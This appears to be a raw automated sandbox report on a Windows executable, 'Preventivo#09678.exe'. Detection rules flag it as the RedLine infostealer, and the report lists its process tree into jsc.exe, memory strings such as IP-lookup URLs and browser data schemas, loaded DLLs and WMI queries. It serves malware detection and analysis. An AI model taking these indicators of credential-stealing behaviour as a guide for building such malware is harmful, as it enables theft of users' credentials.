                    Source: jsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: jsc.exe PID: 6936, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC63F7E90_2_00007FFAAC63F7E9
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC63C8800_2_00007FFAAC63C880
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC639A800_2_00007FFAAC639A80
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC639A880_2_00007FFAAC639A88
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC63CC610_2_00007FFAAC63CC61
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC6354400_2_00007FFAAC635440
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC6317000_2_00007FFAAC631700
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC6413870_2_00007FFAAC641387
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 0_2_00007FFAAC7100010_2_00007FFAAC710001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_015EE7B07_2_015EE7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_015EDC907_2_015EDC90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069B96D07_2_069B96D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069BD5C87_2_069BD5C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069B45087_2_069B4508
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069B12107_2_069B1210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069B33C07_2_069B33C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_069BDAD07_2_069BDAD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DC3387_2_073DC338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DFB007_2_073DFB00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073D5F787_2_073D5F78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DADB07_2_073DADB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DF4187_2_073DF418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073D73287_2_073D7328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DA1187_2_073DA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073DB9707_2_073DB970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 7_2_073D89D07_2_073D89D0
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5092 -s 1152
                    Source: Preventivo#09678.exeStatic PE information: No import functions for PE file found
                    Source: Preventivo#09678.exe, 00000000.00000000.1222104674.00000213C9646000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKostanay.exeB vs Preventivo#09678.exe
                    Source: Preventivo#09678.exe, 00000000.00000002.1517860910.00000213CB540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIrosonuvic: vs Preventivo#09678.exe
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Preventivo#09678.exe
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DC17A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIrosonuvic: vs Preventivo#09678.exe
                    Source: Preventivo#09678.exeBinary or memory string: OriginalFilenameKostanay.exeB vs Preventivo#09678.exe
                    Source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: jsc.exe PID: 6936, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Preventivo#09678.exe, DTSubStringTypeCreateNewOnMetadataUpdateAttribute.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@5/50@1/1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMutant created: NULL
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5092
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEEF9.tmpJump to behavior
                    Source: Preventivo#09678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Preventivo#09678.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmpD703.tmp.7.dr, tmp4829.tmp.7.dr, tmp483C.tmp.7.dr, tmpD6E2.tmp.7.dr, tmp484C.tmp.7.dr, tmpD6F2.tmp.7.dr, tmp485D.tmp.7.dr, tmpD6BF.tmp.7.dr, tmpD6E1.tmp.7.dr, tmp482A.tmp.7.dr, tmpD6D0.tmp.7.dr, tmp483B.tmp.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeFile read: C:\Users\user\Desktop\Preventivo#09678.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Preventivo#09678.exe "C:\Users\user\Desktop\Preventivo#09678.exe"
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5092 -s 1152
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Preventivo#09678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Preventivo#09678.exeStatic file information: File size 1583745 > 1048576
                    Source: Preventivo#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Preventivo#09678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbx source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
